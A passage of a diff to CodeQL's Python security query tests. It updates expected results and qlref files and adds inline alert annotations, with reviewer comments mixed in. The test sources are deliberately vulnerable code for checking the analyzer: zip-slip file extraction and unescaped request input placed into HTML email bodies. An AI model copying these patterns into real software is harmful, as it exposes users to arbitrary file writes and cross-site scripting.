@@ -1,3 +1,9 @@ +#select +| zipslip_bad.py:8:10:8:31 | ControlFlowNode for Attribute() | zipslip_bad.py:8:10:8:31 | ControlFlowNode for Attribute() | zipslip_bad.py:11:25:11:29 | ControlFlowNode for entry | This unsanitized archive entry, which may contain '..', is used in a $@. | zipslip_bad.py:11:25:11:29 | ControlFlowNode for entry | file system operation | +| zipslip_bad.py:14:10:14:28 | ControlFlowNode for Attribute() | zipslip_bad.py:14:10:14:28 | ControlFlowNode for Attribute() | zipslip_bad.py:17:26:17:30 | ControlFlowNode for entry | This unsanitized archive entry, which may contain '..', is used in a $@. | zipslip_bad.py:17:26:17:30 | ControlFlowNode for entry | file system operation | +| zipslip_bad.py:20:10:20:27 | ControlFlowNode for Attribute() | zipslip_bad.py:20:10:20:27 | ControlFlowNode for Attribute() | zipslip_bad.py:23:29:23:33 | ControlFlowNode for entry | This unsanitized archive entry, which may contain '..', is used in a $@. | zipslip_bad.py:23:29:23:33 | ControlFlowNode for entry | file system operation | +| zipslip_bad.py:27:10:27:22 | ControlFlowNode for Attribute() | zipslip_bad.py:27:10:27:22 | ControlFlowNode for Attribute() | zipslip_bad.py:30:25:30:25 | ControlFlowNode for x | This unsanitized archive entry, which may contain '..', is used in a $@. | zipslip_bad.py:30:25:30:25 | ControlFlowNode for x | file system operation | +| zipslip_bad.py:34:16:34:28 | ControlFlowNode for Attribute() | zipslip_bad.py:34:16:34:28 | ControlFlowNode for Attribute() | zipslip_bad.py:37:32:37:32 | ControlFlowNode for x | This unsanitized archive entry, which may contain '..', is used in a $@. | zipslip_bad.py:37:32:37:32 | ControlFlowNode for x | file system operation | edges | zipslip_bad.py:8:10:8:31 | ControlFlowNode for Attribute() | zipslip_bad.py:8:36:8:39 | ControlFlowNode for zipf | provenance | | | zipslip_bad.py:8:36:8:39 | ControlFlowNode for zipf | zipslip_bad.py:10:13:10:17 | ControlFlowNode for entry | provenance | | 
@@ -36,9 +42,3 @@ nodes | zipslip_bad.py:35:9:35:9 | ControlFlowNode for x | semmle.label | ControlFlowNode for x | | zipslip_bad.py:37:32:37:32 | ControlFlowNode for x | semmle.label | ControlFlowNode for x | subpaths -#select -| zipslip_bad.py:8:10:8:31 | ControlFlowNode for Attribute() | zipslip_bad.py:8:10:8:31 | ControlFlowNode for Attribute() | zipslip_bad.py:11:25:11:29 | ControlFlowNode for entry | This unsanitized archive entry, which may contain '..', is used in a $@. | zipslip_bad.py:11:25:11:29 | ControlFlowNode for entry | file system operation | -| zipslip_bad.py:14:10:14:28 | ControlFlowNode for Attribute() | zipslip_bad.py:14:10:14:28 | ControlFlowNode for Attribute() | zipslip_bad.py:17:26:17:30 | ControlFlowNode for entry | This unsanitized archive entry, which may contain '..', is used in a $@. | zipslip_bad.py:17:26:17:30 | ControlFlowNode for entry | file system operation | -| zipslip_bad.py:20:10:20:27 | ControlFlowNode for Attribute() | zipslip_bad.py:20:10:20:27 | ControlFlowNode for Attribute() | zipslip_bad.py:23:29:23:33 | ControlFlowNode for entry | This unsanitized archive entry, which may contain '..', is used in a $@. | zipslip_bad.py:23:29:23:33 | ControlFlowNode for entry | file system operation | -| zipslip_bad.py:27:10:27:22 | ControlFlowNode for Attribute() | zipslip_bad.py:27:10:27:22 | ControlFlowNode for Attribute() | zipslip_bad.py:30:25:30:25 | ControlFlowNode for x | This unsanitized archive entry, which may contain '..', is used in a $@. | zipslip_bad.py:30:25:30:25 | ControlFlowNode for x | file system operation | -| zipslip_bad.py:34:16:34:28 | ControlFlowNode for Attribute() | zipslip_bad.py:34:16:34:28 | ControlFlowNode for Attribute() | zipslip_bad.py:37:32:37:32 | ControlFlowNode for x | This unsanitized archive entry, which may contain '..', is used in a $@. | zipslip_bad.py:37:32:37:32 | ControlFlowNode for x | file system operation | 
diff --git a/python/ql/test/experimental/query-tests/Security/CWE-022-TarSlip/ZipSlip.qlref b/python/ql/test/experimental/query-tests/Security/CWE-022-TarSlip/ZipSlip.qlref index 717dc9d0f105..177a74d6bd74 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-022-TarSlip/ZipSlip.qlref +++ b/python/ql/test/experimental/query-tests/Security/CWE-022-TarSlip/ZipSlip.qlref @@ -1 +1,2 @@ -experimental/Security/CWE-022/ZipSlip.ql +query: experimental/Security/CWE-022/ZipSlip.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/experimental/query-tests/Security/CWE-022-TarSlip/zipslip_bad.py b/python/ql/test/experimental/query-tests/Security/CWE-022-TarSlip/zipslip_bad.py index c622ead874cb..4e7195cf856d 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-022-TarSlip/zipslip_bad.py +++ b/python/ql/test/experimental/query-tests/Security/CWE-022-TarSlip/zipslip_bad.py 
@@ -5,35 +5,35 @@ import zipfile def unzip(filename): - with tarfile.open(filename) as zipf: + with tarfile.open(filename) as zipf: # $ Alert[py/zipslip] #BAD : This could write any file on the filesystem. for entry in zipf: - shutil.move(entry, "/tmp/unpack/") + shutil.move(entry, "/tmp/unpack/") # $ Sink[py/zipslip] def unzip1(filename): - with gzip.open(filename) as zipf: + with gzip.open(filename) as zipf: # $ Alert[py/zipslip] #BAD : This could write any file on the filesystem. for entry in zipf: - shutil.copy2(entry, "/tmp/unpack/") + shutil.copy2(entry, "/tmp/unpack/") # $ Sink[py/zipslip] def unzip2(filename): - with bz2.open(filename) as zipf: + with bz2.open(filename) as zipf: # $ Alert[py/zipslip] #BAD : This could write any file on the filesystem. for entry in zipf: - shutil.copyfile(entry, "/tmp/unpack/") + shutil.copyfile(entry, "/tmp/unpack/") # $ Sink[py/zipslip] def unzip3(filename): zf = zipfile.ZipFile(filename) - with zf.namelist() as filelist: + with zf.namelist() as filelist: # $ Alert[py/zipslip] #BAD : This could write any file on the filesystem. for x in filelist: - shutil.copy(x, "/tmp/unpack/") + shutil.copy(x, "/tmp/unpack/") # $ Sink[py/zipslip] def unzip4(filename): zf = zipfile.ZipFile(filename) - filelist = zf.namelist() + filelist = zf.namelist() # $ Alert[py/zipslip] for x in filelist: with zf.open(x) as srcf: - shutil.copyfileobj(x, "/tmp/unpack/") + shutil.copyfileobj(x, "/tmp/unpack/") # $ Sink[py/zipslip] import tty # to set the import root so we can identify the standard library diff --git a/python/ql/test/experimental/query-tests/Security/CWE-074-RemoteCommandExecution/RemoteCommandExecution.qlref b/python/ql/test/experimental/query-tests/Security/CWE-074-RemoteCommandExecution/RemoteCommandExecution.qlref index dc5c7028f329..96e8c4e0d443 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-074-RemoteCommandExecution/RemoteCommandExecution.qlref 
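Review bot: The tags in this file put `Alert[py/zipslip]` on the archive-open line and `Sink[py/zipslip]` on the `shutil` call, the reverse of TarSlipImprov.py in the same commit, where the open call is `Source` and the extraction is `Alert`. That agrees with the `#select` rows added to ZipSlip.expected, which report at the open call and reach the file-system operation through `$@`, but the test file itself does not say so. A one-line comment above `unzip`, for example `# py/zipslip reports at the archive-open call; the file-system operation is tagged as its Sink`, would keep a later reader from "correcting" the tags. The same comment covers `unzip4`, where the alert sits on `zf.namelist()` rather than on a `with` line; the top of the file is outside this hunk.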
+++ b/python/ql/test/experimental/query-tests/Security/CWE-074-RemoteCommandExecution/RemoteCommandExecution.qlref
@@ -1 +1 @@
-experimental/Security/CWE-074/remoteCommandExecution/RemoteCommandExecution.ql
\ No newline at end of file
+query: experimental/Security/CWE-074/remoteCommandExecution/RemoteCommandExecution.ql
diff --git a/python/ql/test/experimental/query-tests/Security/CWE-079/EmailXss.expected b/python/ql/test/experimental/query-tests/Security/CWE-079/EmailXss.expected
index 8f0493b79278..0a7dde1b81de 100644
--- a/python/ql/test/experimental/query-tests/Security/CWE-079/EmailXss.expected
+++ b/python/ql/test/experimental/query-tests/Security/CWE-079/EmailXss.expected
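Review bot: This qlref is converted to the `query:` form but, unlike TarSlip.qlref and ZipSlip.qlref in the same commit, it gets no `postprocess: utils/test/InlineExpectationsTestQuery.ql` line. If that is deliberate, presumably because the test sources for this query carry no inline `# $ Alert` annotations yet, a sentence in the commit description would make the gap visible. Otherwise the second line `postprocess: utils/test/InlineExpectationsTestQuery.ql` looks missing, and this injection query's test would continue to be checked against the .expected file alone.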
@@ -1,3 +1,18 @@ +#select +| django_mail.py:14:48:14:82 | ControlFlowNode for Attribute() | django_mail.py:14:48:14:82 | ControlFlowNode for Attribute() | django_mail.py:14:48:14:82 | ControlFlowNode for Attribute() | Cross-site scripting vulnerability due to $@. | django_mail.py:14:48:14:82 | ControlFlowNode for Attribute() | a user-provided value | +| django_mail.py:23:30:23:64 | ControlFlowNode for Attribute() | django_mail.py:23:30:23:64 | ControlFlowNode for Attribute() | django_mail.py:23:30:23:64 | ControlFlowNode for Attribute() | Cross-site scripting vulnerability due to $@. | django_mail.py:23:30:23:64 | ControlFlowNode for Attribute() | a user-provided value | +| django_mail.py:25:32:25:66 | ControlFlowNode for Attribute() | django_mail.py:25:32:25:66 | ControlFlowNode for Attribute() | django_mail.py:25:32:25:66 | ControlFlowNode for Attribute() | Cross-site scripting vulnerability due to $@. | django_mail.py:25:32:25:66 | ControlFlowNode for Attribute() | a user-provided value | +| flask_mail.py:13:22:13:41 | ControlFlowNode for Subscript | flask_mail.py:1:19:1:25 | ControlFlowNode for ImportMember | flask_mail.py:13:22:13:41 | ControlFlowNode for Subscript | Cross-site scripting vulnerability due to $@. | flask_mail.py:1:19:1:25 | ControlFlowNode for ImportMember | a user-provided value | +| flask_mail.py:18:14:18:33 | ControlFlowNode for Subscript | flask_mail.py:1:19:1:25 | ControlFlowNode for ImportMember | flask_mail.py:18:14:18:33 | ControlFlowNode for Subscript | Cross-site scripting vulnerability due to $@. | flask_mail.py:1:19:1:25 | ControlFlowNode for ImportMember | a user-provided value | +| flask_mail.py:31:24:31:43 | ControlFlowNode for Subscript | flask_mail.py:1:19:1:25 | ControlFlowNode for ImportMember | flask_mail.py:31:24:31:43 | ControlFlowNode for Subscript | Cross-site scripting vulnerability due to $@. 
| flask_mail.py:1:19:1:25 | ControlFlowNode for ImportMember | a user-provided value | +| sendgrid_mail.py:14:22:14:49 | ControlFlowNode for Subscript | sendgrid_mail.py:1:19:1:25 | ControlFlowNode for ImportMember | sendgrid_mail.py:14:22:14:49 | ControlFlowNode for Subscript | Cross-site scripting vulnerability due to $@. | sendgrid_mail.py:1:19:1:25 | ControlFlowNode for ImportMember | a user-provided value | +| sendgrid_mail.py:26:22:26:62 | ControlFlowNode for HtmlContent() | sendgrid_mail.py:1:19:1:25 | ControlFlowNode for ImportMember | sendgrid_mail.py:26:22:26:62 | ControlFlowNode for HtmlContent() | Cross-site scripting vulnerability due to $@. | sendgrid_mail.py:1:19:1:25 | ControlFlowNode for ImportMember | a user-provided value | +| sendgrid_mail.py:37:41:37:68 | ControlFlowNode for Subscript | sendgrid_mail.py:1:19:1:25 | ControlFlowNode for ImportMember | sendgrid_mail.py:37:41:37:68 | ControlFlowNode for Subscript | Cross-site scripting vulnerability due to $@. | sendgrid_mail.py:1:19:1:25 | ControlFlowNode for ImportMember | a user-provided value | +| sendgrid_via_mail_send_post_request_body_bad.py:16:26:16:79 | ControlFlowNode for Attribute() | sendgrid_via_mail_send_post_request_body_bad.py:3:19:3:25 | ControlFlowNode for ImportMember | sendgrid_via_mail_send_post_request_body_bad.py:16:26:16:79 | ControlFlowNode for Attribute() | Cross-site scripting vulnerability due to $@. | sendgrid_via_mail_send_post_request_body_bad.py:3:19:3:25 | ControlFlowNode for ImportMember | a user-provided value | +| sendgrid_via_mail_send_post_request_body_bad.py:27:25:27:77 | ControlFlowNode for Attribute() | sendgrid_via_mail_send_post_request_body_bad.py:3:19:3:25 | ControlFlowNode for ImportMember | sendgrid_via_mail_send_post_request_body_bad.py:27:25:27:77 | ControlFlowNode for Attribute() | Cross-site scripting vulnerability due to $@. 
| sendgrid_via_mail_send_post_request_body_bad.py:3:19:3:25 | ControlFlowNode for ImportMember | a user-provided value | +| sendgrid_via_mail_send_post_request_body_bad.py:41:25:41:79 | ControlFlowNode for Attribute() | sendgrid_via_mail_send_post_request_body_bad.py:3:19:3:25 | ControlFlowNode for ImportMember | sendgrid_via_mail_send_post_request_body_bad.py:41:25:41:79 | ControlFlowNode for Attribute() | Cross-site scripting vulnerability due to $@. | sendgrid_via_mail_send_post_request_body_bad.py:3:19:3:25 | ControlFlowNode for ImportMember | a user-provided value | +| smtplib_bad_subparts.py:24:22:24:25 | ControlFlowNode for html | smtplib_bad_subparts.py:2:26:2:32 | ControlFlowNode for ImportMember | smtplib_bad_subparts.py:24:22:24:25 | ControlFlowNode for html | Cross-site scripting vulnerability due to $@. | smtplib_bad_subparts.py:2:26:2:32 | ControlFlowNode for ImportMember | a user-provided value | +| smtplib_bad_via_attach.py:27:22:27:25 | ControlFlowNode for html | smtplib_bad_via_attach.py:2:26:2:32 | ControlFlowNode for ImportMember | smtplib_bad_via_attach.py:27:22:27:25 | ControlFlowNode for html | Cross-site scripting vulnerability due to $@. | smtplib_bad_via_attach.py:2:26:2:32 | ControlFlowNode for ImportMember | a user-provided value | edges | flask_mail.py:1:19:1:25 | ControlFlowNode for ImportMember | flask_mail.py:1:19:1:25 | ControlFlowNode for request | provenance | | | flask_mail.py:1:19:1:25 | ControlFlowNode for request | flask_mail.py:13:22:13:28 | ControlFlowNode for request | provenance | | 
@@ -77,18 +92,3 @@ nodes | smtplib_bad_via_attach.py:23:5:23:8 | ControlFlowNode for html | semmle.label | ControlFlowNode for html | | smtplib_bad_via_attach.py:27:22:27:25 | ControlFlowNode for html | semmle.label | ControlFlowNode for html | subpaths -#select -| django_mail.py:14:48:14:82 | ControlFlowNode for Attribute() | django_mail.py:14:48:14:82 | ControlFlowNode for Attribute() | django_mail.py:14:48:14:82 | ControlFlowNode for Attribute() | Cross-site scripting vulnerability due to $@. | django_mail.py:14:48:14:82 | ControlFlowNode for Attribute() | a user-provided value | -| django_mail.py:23:30:23:64 | ControlFlowNode for Attribute() | django_mail.py:23:30:23:64 | ControlFlowNode for Attribute() | django_mail.py:23:30:23:64 | ControlFlowNode for Attribute() | Cross-site scripting vulnerability due to $@. | django_mail.py:23:30:23:64 | ControlFlowNode for Attribute() | a user-provided value | -| django_mail.py:25:32:25:66 | ControlFlowNode for Attribute() | django_mail.py:25:32:25:66 | ControlFlowNode for Attribute() | django_mail.py:25:32:25:66 | ControlFlowNode for Attribute() | Cross-site scripting vulnerability due to $@. | django_mail.py:25:32:25:66 | ControlFlowNode for Attribute() | a user-provided value | -| flask_mail.py:13:22:13:41 | ControlFlowNode for Subscript | flask_mail.py:1:19:1:25 | ControlFlowNode for ImportMember | flask_mail.py:13:22:13:41 | ControlFlowNode for Subscript | Cross-site scripting vulnerability due to $@. | flask_mail.py:1:19:1:25 | ControlFlowNode for ImportMember | a user-provided value | -| flask_mail.py:18:14:18:33 | ControlFlowNode for Subscript | flask_mail.py:1:19:1:25 | ControlFlowNode for ImportMember | flask_mail.py:18:14:18:33 | ControlFlowNode for Subscript | Cross-site scripting vulnerability due to $@. 
| flask_mail.py:1:19:1:25 | ControlFlowNode for ImportMember | a user-provided value | -| flask_mail.py:31:24:31:43 | ControlFlowNode for Subscript | flask_mail.py:1:19:1:25 | ControlFlowNode for ImportMember | flask_mail.py:31:24:31:43 | ControlFlowNode for Subscript | Cross-site scripting vulnerability due to $@. | flask_mail.py:1:19:1:25 | ControlFlowNode for ImportMember | a user-provided value | -| sendgrid_mail.py:14:22:14:49 | ControlFlowNode for Subscript | sendgrid_mail.py:1:19:1:25 | ControlFlowNode for ImportMember | sendgrid_mail.py:14:22:14:49 | ControlFlowNode for Subscript | Cross-site scripting vulnerability due to $@. | sendgrid_mail.py:1:19:1:25 | ControlFlowNode for ImportMember | a user-provided value | -| sendgrid_mail.py:26:22:26:62 | ControlFlowNode for HtmlContent() | sendgrid_mail.py:1:19:1:25 | ControlFlowNode for ImportMember | sendgrid_mail.py:26:22:26:62 | ControlFlowNode for HtmlContent() | Cross-site scripting vulnerability due to $@. | sendgrid_mail.py:1:19:1:25 | ControlFlowNode for ImportMember | a user-provided value | -| sendgrid_mail.py:37:41:37:68 | ControlFlowNode for Subscript | sendgrid_mail.py:1:19:1:25 | ControlFlowNode for ImportMember | sendgrid_mail.py:37:41:37:68 | ControlFlowNode for Subscript | Cross-site scripting vulnerability due to $@. | sendgrid_mail.py:1:19:1:25 | ControlFlowNode for ImportMember | a user-provided value | -| sendgrid_via_mail_send_post_request_body_bad.py:16:26:16:79 | ControlFlowNode for Attribute() | sendgrid_via_mail_send_post_request_body_bad.py:3:19:3:25 | ControlFlowNode for ImportMember | sendgrid_via_mail_send_post_request_body_bad.py:16:26:16:79 | ControlFlowNode for Attribute() | Cross-site scripting vulnerability due to $@. 
| sendgrid_via_mail_send_post_request_body_bad.py:3:19:3:25 | ControlFlowNode for ImportMember | a user-provided value | -| sendgrid_via_mail_send_post_request_body_bad.py:27:25:27:77 | ControlFlowNode for Attribute() | sendgrid_via_mail_send_post_request_body_bad.py:3:19:3:25 | ControlFlowNode for ImportMember | sendgrid_via_mail_send_post_request_body_bad.py:27:25:27:77 | ControlFlowNode for Attribute() | Cross-site scripting vulnerability due to $@. | sendgrid_via_mail_send_post_request_body_bad.py:3:19:3:25 | ControlFlowNode for ImportMember | a user-provided value | -| sendgrid_via_mail_send_post_request_body_bad.py:41:25:41:79 | ControlFlowNode for Attribute() | sendgrid_via_mail_send_post_request_body_bad.py:3:19:3:25 | ControlFlowNode for ImportMember | sendgrid_via_mail_send_post_request_body_bad.py:41:25:41:79 | ControlFlowNode for Attribute() | Cross-site scripting vulnerability due to $@. | sendgrid_via_mail_send_post_request_body_bad.py:3:19:3:25 | ControlFlowNode for ImportMember | a user-provided value | -| smtplib_bad_subparts.py:24:22:24:25 | ControlFlowNode for html | smtplib_bad_subparts.py:2:26:2:32 | ControlFlowNode for ImportMember | smtplib_bad_subparts.py:24:22:24:25 | ControlFlowNode for html | Cross-site scripting vulnerability due to $@. | smtplib_bad_subparts.py:2:26:2:32 | ControlFlowNode for ImportMember | a user-provided value | -| smtplib_bad_via_attach.py:27:22:27:25 | ControlFlowNode for html | smtplib_bad_via_attach.py:2:26:2:32 | ControlFlowNode for ImportMember | smtplib_bad_via_attach.py:27:22:27:25 | ControlFlowNode for html | Cross-site scripting vulnerability due to $@. | smtplib_bad_via_attach.py:2:26:2:32 | ControlFlowNode for ImportMember | a user-provided value | diff --git a/python/ql/test/experimental/query-tests/Security/CWE-079/EmailXss.qlref b/python/ql/test/experimental/query-tests/Security/CWE-079/EmailXss.qlref index fcc132dd66c5..c141aa6746b3 100644 
--- a/python/ql/test/experimental/query-tests/Security/CWE-079/EmailXss.qlref +++ b/python/ql/test/experimental/query-tests/Security/CWE-079/EmailXss.qlref @@ -1 +1,2 @@ -experimental/Security/CWE-079/EmailXss.ql +query: experimental/Security/CWE-079/EmailXss.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/experimental/query-tests/Security/CWE-079/django_mail.py b/python/ql/test/experimental/query-tests/Security/CWE-079/django_mail.py index 178e8decc798..fb42c22f02ed 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-079/django_mail.py +++ b/python/ql/test/experimental/query-tests/Security/CWE-079/django_mail.py @@ -11,7 +11,7 @@ def django_response(request): https://github.com/django/django/blob/ca9872905559026af82000e46cde6f7dedc897b6/django/core/mail/__init__.py#L64 """ send_mail("Subject", "plain-text body", "from@example.com", - ["to@example.com"], html_message=django.http.request.GET.get("html")) + ["to@example.com"], html_message=django.http.request.GET.get("html")) # $ Alert def django_response(request): @@ -20,6 +20,6 @@ def django_response(request): https://github.com/django/django/blob/ca9872905559026af82000e46cde6f7dedc897b6/django/core/mail/__init__.py#L90-L121 """ mail_admins("Subject", "plain-text body", - html_message=django.http.request.GET.get("html")) + html_message=django.http.request.GET.get("html")) # $ Alert mail_managers("Subject", "plain-text body", - html_message=django.http.request.GET.get("html")) + html_message=django.http.request.GET.get("html")) # $ Alert diff --git a/python/ql/test/experimental/query-tests/Security/CWE-079/flask_mail.py b/python/ql/test/experimental/query-tests/Security/CWE-079/flask_mail.py index e8bdcc93634c..6978ad741f6a 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-079/flask_mail.py +++ b/python/ql/test/experimental/query-tests/Security/CWE-079/flask_mail.py 
@@ -1,4 +1,4 @@ -from flask import request, Flask +from flask import request, Flask # $ Source from flask_mail import Mail, Message app = Flask(__name__) @@ -10,12 +10,12 @@ def send(): sender="from@example.com", recipients=["to@example.com"], body="plain-text body", - html=request.args["html"]) + html=request.args["html"]) # $ Alert # The message can contain a body and/or HTML: msg.body = "plain-text body" # The email's HTML can be set via msg.html or as an initialize argument when creating a Message object. - msg.html = request.args["html"] + msg.html = request.args["html"] # $ Alert mail.send(msg) @@ -28,5 +28,5 @@ def connect(): msg = Message(subject="Subject", sender="from@example.com", recipients=["to@example.com"], - html=request.args["html"]) + html=request.args["html"]) # $ Alert conn.send(msg) diff --git a/python/ql/test/experimental/query-tests/Security/CWE-079/sendgrid_mail.py b/python/ql/test/experimental/query-tests/Security/CWE-079/sendgrid_mail.py index e10e8a030a81..4d89056f3fed 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-079/sendgrid_mail.py +++ b/python/ql/test/experimental/query-tests/Security/CWE-079/sendgrid_mail.py @@ -1,4 +1,4 @@ -from flask import request, Flask +from flask import request, Flask # $ Source from sendgrid import SendGridAPIClient from sendgrid.helpers.mail import Mail, Email, To, Content, MimeType, HtmlContent @@ -11,7 +11,7 @@ def send(): from_email='from_email@example.com', to_emails='to@example.com', subject='Sending with Twilio SendGrid is Fun', - html_content=request.args["html_content"]) + html_content=request.args["html_content"]) # $ Alert sg = SendGridAPIClient('SENDGRID_API_KEY') sg.send(message) 
@@ -23,7 +23,7 @@ def send(): from_email='from_email@example.com', to_emails='to@example.com', subject='Sending with Twilio SendGrid is Fun', - html_content=HtmlContent(request.args["html_content"])) + html_content=HtmlContent(request.args["html_content"])) # $ Alert sg = SendGridAPIClient('SENDGRID_API_KEY') sg.send(message) @@ -34,7 +34,7 @@ def send_post(): from_email = Email("test@example.com") to_email = To("test@example.com") subject = "Sending with SendGrid is Fun" - html_content = Content("text/html", request.args["html_content"]) + html_content = Content("text/html", request.args["html_content"]) # $ Alert plain_content = Content("text/plain", request.args["plain_content"]) mail = Mail(from_email, to_email, subject, plain_content, html_content) diff --git a/python/ql/test/experimental/query-tests/Security/CWE-079/sendgrid_via_mail_send_post_request_body_bad.py b/python/ql/test/experimental/query-tests/Security/CWE-079/sendgrid_via_mail_send_post_request_body_bad.py index fca641057da6..30a67213b487 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-079/sendgrid_via_mail_send_post_request_body_bad.py +++ b/python/ql/test/experimental/query-tests/Security/CWE-079/sendgrid_via_mail_send_post_request_body_bad.py @@ -1,6 +1,6 @@ import sendgrid import os -from flask import request, Flask +from flask import request, Flask # $ Source app = Flask(__name__) @@ -13,7 +13,7 @@ def send(): "content": [ { "type": "text/html", - "value": "{}".format(request.args["html_content"]) + "value": "{}".format(request.args["html_content"]) # $ Alert } ], "from": { @@ -24,7 +24,7 @@ def send(): "mail_settings": { "footer": { "enable": True, - "html": "{}".format(request.args["html_footer"]), + "html": "{}".format(request.args["html_footer"]), # $ Alert "text": "Thanks,/n The SendGrid Team" }, }, 
@@ -38,7 +38,7 @@ def send(): "tracking_settings": { "subscription_tracking": { "enable": True, - "html": "{}".format(request.args["html_tracking"]), + "html": "{}".format(request.args["html_tracking"]), # $ Alert "substitution_tag": "<%click here%>", "text": "If you would like to unsubscribe and stop receiving these emails <% click here %>." } diff --git a/python/ql/test/experimental/query-tests/Security/CWE-079/smtplib_bad_subparts.py b/python/ql/test/experimental/query-tests/Security/CWE-079/smtplib_bad_subparts.py index 209bd889393f..20c8e3466aef 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-079/smtplib_bad_subparts.py +++ b/python/ql/test/experimental/query-tests/Security/CWE-079/smtplib_bad_subparts.py @@ -1,5 +1,5 @@ # This test checks that the developer doesn't pass a MIMEText instance to a MIMEMultipart initializer via the subparts parameter. -from flask import Flask, request +from flask import Flask, request # $ Source import json import smtplib import ssl @@ -21,7 +21,7 @@ def email_person(): # Turn these into plain/html MIMEText objects part1 = MIMEText(text, "plain") - part2 = MIMEText(html, "html") + part2 = MIMEText(html, "html") # $ Alert message = MIMEMultipart(_subparts=(part1, part2)) message["Subject"] = "multipart test" diff --git a/python/ql/test/experimental/query-tests/Security/CWE-079/smtplib_bad_via_attach.py b/python/ql/test/experimental/query-tests/Security/CWE-079/smtplib_bad_via_attach.py index 48a228b0bc6e..d50ab028087f 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-079/smtplib_bad_via_attach.py +++ b/python/ql/test/experimental/query-tests/Security/CWE-079/smtplib_bad_via_attach.py @@ -1,5 +1,5 @@ # This test checks that the developer doesn't pass a MIMEText instance to a MIMEMultipart message. -from flask import Flask, request +from flask import Flask, request # $ Source import json import smtplib, ssl from email.mime.text import MIMEText 
@@ -24,7 +24,7 @@ def email_person(): # Turn these into plain/html MIMEText objects part1 = MIMEText(text, "plain") - part2 = MIMEText(html, "html") + part2 = MIMEText(html, "html") # $ Alert # Add HTML/plain-text parts to MIMEMultipart message # The email client will try to render the last part first diff --git a/python/ql/test/experimental/query-tests/Security/CWE-091-XsltInjection/XsltInjection.expected b/python/ql/test/experimental/query-tests/Security/CWE-091-XsltInjection/XsltInjection.expected index 8d960a22dfde..28c85388a97f 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-091-XsltInjection/XsltInjection.expected +++ b/python/ql/test/experimental/query-tests/Security/CWE-091-XsltInjection/XsltInjection.expected 
@@ -1,3 +1,10 @@ +#select +| xslt.py:14:29:14:37 | ControlFlowNode for xslt_root | xslt.py:3:26:3:32 | ControlFlowNode for ImportMember | xslt.py:14:29:14:37 | ControlFlowNode for xslt_root | This XSLT query depends on $@. | xslt.py:3:26:3:32 | ControlFlowNode for ImportMember | user-provided value | +| xsltInjection.py:12:28:12:36 | ControlFlowNode for xslt_root | xsltInjection.py:3:26:3:32 | ControlFlowNode for ImportMember | xsltInjection.py:12:28:12:36 | ControlFlowNode for xslt_root | This XSLT query depends on $@. | xsltInjection.py:3:26:3:32 | ControlFlowNode for ImportMember | user-provided value | +| xsltInjection.py:21:29:21:37 | ControlFlowNode for xslt_root | xsltInjection.py:3:26:3:32 | ControlFlowNode for ImportMember | xsltInjection.py:21:29:21:37 | ControlFlowNode for xslt_root | This XSLT query depends on $@. | xsltInjection.py:3:26:3:32 | ControlFlowNode for ImportMember | user-provided value | +| xsltInjection.py:31:24:31:32 | ControlFlowNode for xslt_root | xsltInjection.py:3:26:3:32 | ControlFlowNode for ImportMember | xsltInjection.py:31:24:31:32 | ControlFlowNode for xslt_root | This XSLT query depends on $@. | xsltInjection.py:3:26:3:32 | ControlFlowNode for ImportMember | user-provided value | +| xsltInjection.py:40:24:40:32 | ControlFlowNode for xslt_root | xsltInjection.py:3:26:3:32 | ControlFlowNode for ImportMember | xsltInjection.py:40:24:40:32 | ControlFlowNode for xslt_root | This XSLT query depends on $@. | xsltInjection.py:3:26:3:32 | ControlFlowNode for ImportMember | user-provided value | +| xsltInjection.py:50:24:50:32 | ControlFlowNode for xslt_root | xsltInjection.py:3:26:3:32 | ControlFlowNode for ImportMember | xsltInjection.py:50:24:50:32 | ControlFlowNode for xslt_root | This XSLT query depends on $@. 
| xsltInjection.py:3:26:3:32 | ControlFlowNode for ImportMember | user-provided value | edges | xslt.py:3:26:3:32 | ControlFlowNode for ImportMember | xslt.py:3:26:3:32 | ControlFlowNode for request | provenance | | | xslt.py:3:26:3:32 | ControlFlowNode for request | xslt.py:10:17:10:23 | ControlFlowNode for request | provenance | | 
@@ -122,10 +129,3 @@ nodes | xsltInjection.py:46:38:46:48 | ControlFlowNode for xsltStrings [List element] | semmle.label | ControlFlowNode for xsltStrings [List element] | | xsltInjection.py:50:24:50:32 | ControlFlowNode for xslt_root | semmle.label | ControlFlowNode for xslt_root | subpaths -#select -| xslt.py:14:29:14:37 | ControlFlowNode for xslt_root | xslt.py:3:26:3:32 | ControlFlowNode for ImportMember | xslt.py:14:29:14:37 | ControlFlowNode for xslt_root | This XSLT query depends on $@. | xslt.py:3:26:3:32 | ControlFlowNode for ImportMember | user-provided value | -| xsltInjection.py:12:28:12:36 | ControlFlowNode for xslt_root | xsltInjection.py:3:26:3:32 | ControlFlowNode for ImportMember | xsltInjection.py:12:28:12:36 | ControlFlowNode for xslt_root | This XSLT query depends on $@. | xsltInjection.py:3:26:3:32 | ControlFlowNode for ImportMember | user-provided value | -| xsltInjection.py:21:29:21:37 | ControlFlowNode for xslt_root | xsltInjection.py:3:26:3:32 | ControlFlowNode for ImportMember | xsltInjection.py:21:29:21:37 | ControlFlowNode for xslt_root | This XSLT query depends on $@. | xsltInjection.py:3:26:3:32 | ControlFlowNode for ImportMember | user-provided value | -| xsltInjection.py:31:24:31:32 | ControlFlowNode for xslt_root | xsltInjection.py:3:26:3:32 | ControlFlowNode for ImportMember | xsltInjection.py:31:24:31:32 | ControlFlowNode for xslt_root | This XSLT query depends on $@. | xsltInjection.py:3:26:3:32 | ControlFlowNode for ImportMember | user-provided value | -| xsltInjection.py:40:24:40:32 | ControlFlowNode for xslt_root | xsltInjection.py:3:26:3:32 | ControlFlowNode for ImportMember | xsltInjection.py:40:24:40:32 | ControlFlowNode for xslt_root | This XSLT query depends on $@. 
